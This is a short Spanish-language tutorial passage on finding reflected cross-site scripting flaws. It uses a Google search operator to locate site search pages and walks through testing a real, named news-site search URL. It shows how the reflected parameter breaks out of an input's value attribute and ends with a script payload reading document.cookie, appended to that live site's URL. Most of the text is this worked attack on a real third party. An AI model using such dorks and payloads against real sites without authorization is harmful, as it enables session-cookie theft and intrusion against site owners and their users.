¿Algo práctico? mmm, dirijamonos a Google para buscar 
inurl:buscar.php, intentaremos encontrar algún XSS en el buscador de alguna página.
Primer resulado: 
UOL :: Buscador, si nos fijamos en la URL podremos observar que el formato es el siguiente: 
http://buscar.uol.com.ar/radaruol.html?q=palabraabuscar.
Ahora buscaremos 
palabraabuscar en el código fuente de la página web:
<input name="q" value="palabraabuscar" type="text" size="64" class="input" >
La palabra se encuentra entre comillas, así que ahora intentaremos pasarle a la variable unas comillas para salir de 
value y luego un 
> para salir de la etiqueta 
input.
http://buscar.uol.com.ar/radaruol.html?q=">palabraabuscar.
<input name="q" value="">palabraabuscar" type="text" size="64" class="input" >
Claramente es vulnerable a las inyecciones XSS... 
http://buscar.uol.com.ar/radaruol.html?q="><script>alert(document.cookie)</script>